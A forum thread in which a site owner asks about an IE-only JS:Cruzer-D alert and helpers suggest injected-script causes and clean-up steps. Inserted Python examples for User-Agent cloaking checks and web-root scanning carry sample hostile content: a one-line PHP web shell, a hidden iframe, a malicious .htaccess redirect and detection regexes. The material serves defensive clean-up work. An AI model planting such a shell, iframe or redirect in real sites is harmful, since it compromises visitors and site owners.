JS:Cruzer-D on the site

Hello,

I have a website in Polish and avast home reports there is a virus on the site. It claims it is JS:Cruzer-D. I have searched through all the files on the website (hxxp://www.razemdlaewangelii.pl) and I cannot find anything suspicious. Avast reports this particular trojan when people use IE to visit the site. Other browsers and antiviruses do not see this problem. What would you suggest? Thank you very much in advance!

I couldn’t find anything obviously infected either…
Strange that it happens only with IE.
Isn’t there any infected .gif picture being redirected, or a script blocked by Firefox and not by IE?

Well, I have no idea why it happens only in IE. I have tried it in Chrome and FF and could not reproduce it. Also, I have downloaded all the files from the webserver and scanned them with the same avast. It does not report any error. What else should I do? Is it possible that this is FP?

Thank you!

Zbigniew Szalbot

Hi zszalbot,

If it is Joomla related, you had an answer here: http://forum.joomla.pl/showthread.php?t=28904. In the page source there is also this entry:

[edited]:
script type="text/j*vascript" src="htxp://www.lcwords.com/js/pl,158,316b16,000,13,11,1,widget.js"

Bad stuff detector gave this:
No zeroiframes detected!
Check took 5.78 seconds

(Level: 0) Url checked:
xttp://www.razemdlaewangelii.pl
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//media/system/js/mootools.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
htxp://www.razemdlaewangelii.pl//media/system/js/+src+
Blank page / could not connect
No ad codes identified
Could have been it, check where this redirects!

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//media/system/js/caption.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/silverlight.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/wmvplayer.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/swfobject.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
htxp://www.razemdlaewangelii.pl//plugins/content/avreloaded///:
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/avreloaded.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://maps.google.com/maps?file=api&v=2&key=abqiaaaaxjzjkjtp29efay0tentuvht350n9ugo-wypzkrhr3g_nzr-5vhqwp9qusrd4rb57pflwbcbksctruw
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.lcwords.com/js/pl,158,316b16,000,13,11,1,widget.js
Zeroiframes detected on this site: 0
No ad codes identified
See above.

regards,

polonus

It’s strange that I didn’t get an alert with firefox but did with IE, so I don’t know what is on your site that is specific to IE, some sort of browser check to serve different content.

I got two distinct alerts, one with the Web Shield and one with the Standard Shield for a file in the IE browser cache.

Web Shield alert on hXXp://www.razemdlaewangelii.pl/images/stories/konf_2009.jpg
This looks like some sort of jpg exploit.

Standard Shield alert on konf_2009[1].html, which was in my IE Temporary Internet Files cache. The [1] at the end of the file name may not be the same on the web site. See image; this is, I believe, the sole content of this konf_2009[1].html file. It is on a single long line; I have broken it up to make it easier to see in the image.
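The post above suspects a browser check that serves different content to IE than to Firefox. The following is an added example (not code from the thread) of how to test for that: fetch the same URL once per User-Agent string, extract the external script/iframe sources from each response, and report any source that appears for some browsers but not others. The hostnames and the injected iframe in the sample responses are constructed so the script runs offline; a real check passes the default `http_fetch` instead of `fake_fetch`.

```python
"""Compare what a site serves to different browsers (User-Agent strings).

Added example, not code from the forum post. Assumes the injected content is
selected server-side by User-Agent, which is one common way a page can look
clean in Firefox and still be flagged in IE. Runs offline with the
constructed responses at the bottom, or pass a real fetcher.
"""
import re
import urllib.request

USER_AGENTS = {
    "ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "firefox": "Mozilla/5.0 (Windows NT 6.1; rv:3.5) Gecko/20090624 Firefox/3.5",
    "chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/532.0 Chrome/3.0 Safari/532.0",
}

# src="..." on <script> and <iframe> tags; good enough for server-rendered HTML
SRC_RE = re.compile(r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def http_fetch(url, user_agent, timeout=15):
    """Real fetcher: GET url with the given User-Agent, return the body as text."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def external_sources(html, site_host):
    """Return the set of (tag, url) for script/iframe sources not on site_host."""
    found = set()
    for tag, src in SRC_RE.findall(html):
        m = re.match(r"^(?:https?:)?//([^/:]+)", src, re.I)
        if m and m.group(1).lower() != site_host.lower():
            found.add((tag.lower(), src))
    return found


def compare_by_user_agent(url, site_host, fetch=http_fetch, agents=USER_AGENTS):
    """Fetch url once per UA. Return ({ua_name: sources}, cloaked) where cloaked
    is the set of sources that appear for some UAs but not for all of them."""
    per_ua = {name: external_sources(fetch(url, ua), site_host)
              for name, ua in agents.items()}
    common = set.intersection(*per_ua.values())
    cloaked = set.union(*per_ua.values()) - common
    return per_ua, cloaked


# --- constructed sample responses so the example runs offline -------------
BASE_HTML = """<html><head>
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2"></script>
</head><body>ok</body></html>"""
# hypothetical injected tag, served only to MSIE; the host name is made up
INJECTED = '<iframe src="http://evil.example/counter.php" width=0 height=0></iframe>'


def fake_fetch(url, user_agent):
    """Stand-in for http_fetch: the 'server' cloaks on the MSIE token."""
    return BASE_HTML + (INJECTED if "MSIE" in user_agent else "")


if __name__ == "__main__":
    per_ua, cloaked = compare_by_user_agent(
        "http://www.example.test/", "www.example.test", fetch=fake_fetch)
    for name, srcs in per_ua.items():
        print(name, sorted(srcs))
    print("cloaked:", sorted(cloaked))
```

Anything listed under "cloaked" is what a browser-dependent check is hiding from some visitors; the Google Maps API script is external to the site but shows up for every User-Agent, so it is not reported as cloaked.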

Thank you all for helpful comments. The above file is clean. It was created in GIMP and uploaded to server so it is not the problem. I have also scanned it and there does not seem to be any issue with it.

Another user just reported a screenshot from Kaspersky, where it claims there is some false GA code on the site.

I have searched the site and the article database and no joy. I am not able to find anything. One thing that needs to be checked is that the authors of the site frequently embed images from flickr and stock exchange. I wonder if this may be the problem. Is it possible that the system is infected by remote images? But then they are from well known sites… Anyway, all further hints are really appreciated!

The problem is that with content management software pages are created on the fly so to speak so it is possible for that software to be exploited and code injected into pages.

My comment on a possible jpg exploit was based only on the fact that the alert happened on a jpg file, but if it were truly a jpg exploit avast would probably have alerted to that.

You also need to find that konf_2009[1].html page, as it contains only JavaScript, and there is most certainly something wrong there: no HTML content and only obfuscated JavaScript, which is highly suspicious.

So given the above and another scanners also finding something suspect, there is most certainly something not right. You really need to take this up with your host too.

  • This is commonly down to old content management software being vulnerable; see this example of a host’s response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any “default.aspx” or “default.cfm” pages, as those are popular targets too.

  2. Remove any “rogue” files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load redirects into them.

  4. Change all passwords for that end user account: the cp password, the ftp password, and any ftp sub-accounts. Make sure to use a “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
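The host’s clean-up list above (injected JavaScript in index pages, rogue PHP scripts, redirects planted in .htaccess) can be turned into a first-pass scan of a downloaded web root. The script below is an added example, not the host’s or the forum’s code, and its rules are generic indicators rather than a signature for JS:Cruzer-D: script or iframe tags appended after `</html>`, `eval(unescape(...))`-style obfuscation, PHP files that `eval` a decoded payload, and `Redirect`/`RewriteRule` targets on a foreign host. The sample files it writes to a temporary directory are constructed, and their names (`images/cache.php`, `bad.example`) are made up.

```python
"""Scan a web root for the indicators in the host's clean-up list.

Added example, not the host's or the forum's code. The rules are generic
(appended code after </html>, JS obfuscation markers, eval of encoded data in
PHP, external redirects in .htaccess). Runs offline against a constructed
directory; the file names and hosts below are invented.
"""
import os
import re
import tempfile
from pathlib import Path

INDEX_NAMES = {"index.html", "index.htm", "index.php", "default.aspx", "default.cfm"}

# JavaScript obfuscation idioms that rarely appear in hand-written site code
OBFUSCATION_RE = re.compile(
    r"eval\s*\(\s*(?:unescape|atob|String\.fromCharCode)|document\.write\s*\(\s*unescape\s*\(",
    re.I)
# PHP dropper/web-shell idioms: eval of decoded or inflated data, preg_replace /e
PHP_DROPPER_RE = re.compile(
    r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(|preg_replace\s*\([^)]*?/e['\"]",
    re.I)
# Apache directives that send visitors to an absolute URL
HTACCESS_REDIRECT_RE = re.compile(
    r"^\s*(?:Redirect(?:Match|Permanent)?|RewriteRule)\s+.*?(https?://[^\s\]]+)", re.I | re.M)


def check_index_page(text):
    """Indicators for an HTML/index page: code after </html>, obfuscated JS."""
    hits = []
    tail = re.split(r"</html\s*>", text, flags=re.I)
    if len(tail) > 1 and re.search(r"<(script|iframe)\b", tail[-1], re.I):
        hits.append("script/iframe appended after </html>")
    if OBFUSCATION_RE.search(text):
        hits.append("obfuscated JavaScript (eval/unescape/fromCharCode)")
    return hits


def check_php(text):
    """Indicator for a PHP file: eval of an encoded payload."""
    return ["eval of encoded payload (possible web shell/dropper)"] if PHP_DROPPER_RE.search(text) else []


def check_htaccess(text, site_host):
    """Flag Redirect/RewriteRule targets whose host is not the site's own."""
    hits = []
    for url in HTACCESS_REDIRECT_RE.findall(text):
        host = re.match(r"https?://([^/:]+)", url, re.I).group(1).lower()
        if host != site_host.lower():
            hits.append(f"redirect to external host {host}")
    return hits


def scan_webroot(root, site_host):
    """Walk root; return {relative_path: [indicator, ...]} for files with hits."""
    findings = {}
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = []
        if path.name == ".htaccess":
            hits += check_htaccess(text, site_host)
        if path.suffix.lower() == ".php":
            hits += check_php(text)
        if path.name.lower() in INDEX_NAMES or path.suffix.lower() in (".html", ".htm"):
            hits += check_index_page(text)
        if hits:
            findings[str(path.relative_to(root)).replace(os.sep, "/")] = hits
    return findings


# --- constructed sample web root so the example runs offline --------------
SAMPLE_FILES = {
    "index.html": "<html><body>Welcome</body></html>\n"
                  '<script>eval(unescape("%64%6f%63%75%6d%65%6e%74"))</script>',
    "about.html": "<html><body>Clean page</body></html>",
    ".htaccess": "RewriteEngine On\nRewriteRule ^old$ http://www.example.test/new [R=301]\n"
                 "RewriteCond %{HTTP_USER_AGENT} MSIE\nRewriteRule .* http://bad.example/go.php [R,L]\n",
    "images/cache.php": "<?php eval(base64_decode($_POST['c'])); ?>",
    "plugins/ok.php": "<?php echo 'hello'; ?>",
}


def build_sample_root():
    """Write SAMPLE_FILES into a fresh temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, content in SAMPLE_FILES.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_sample_root(), "www.example.test").items()):
        print(rel, "->", "; ".join(hits))
```

Run it against a full download of the account (not only the public HTML directory), since dropped PHP scripts are often placed in writable upload or cache folders. A hit is a file to inspect by hand, not proof of compromise, and a clean result does not clear the site: the checks are deliberately narrow, and the host’s last two steps (changing every password and fixing the injection point) still apply.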

Hi zszalbot,

As Websense Security Labs reports, over 40,000 websites have been infected with new malicious code. Visitors to these sites are redirected to a page called Beladen, where a trojan horse infection takes place. The browser also displays advertisements for supposed antivirus software.

The domain beladen.net was registered in June of last year. For some time it had looked suspicious and it was marked as dangerous. Only now, however, have cybercriminals started to make use of it.

It is not yet known how the websites are being attacked or which vulnerability the criminals are exploiting. Specialists are analysing this. All that is known is that users of older versions of web browsers are at risk from the attacks,

regards,

polonus